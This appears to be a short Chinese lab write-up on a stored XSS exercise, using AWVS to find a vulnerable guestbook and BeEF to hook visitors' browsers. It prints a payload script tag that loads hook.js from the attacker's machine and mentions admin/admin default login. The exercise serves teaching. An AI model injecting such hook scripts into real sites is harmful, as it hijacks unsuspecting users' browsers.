XSS小实验"/>
XSS小实验
实验目的:了解什么是XSS;了解XSS攻击实施
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner)
实验步骤:
XSS部分:利用Beef劫持被攻击者客户端浏览器。
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
1.利用AWVS扫描留言簿网站,发现其存在XSS漏洞
2.Kali使用beef生成恶意代码
3.访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板
<script src="http://Kali的IP地址:3000/hook.js"></script>
4.管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页
更多推荐
XSS小实验
发布评论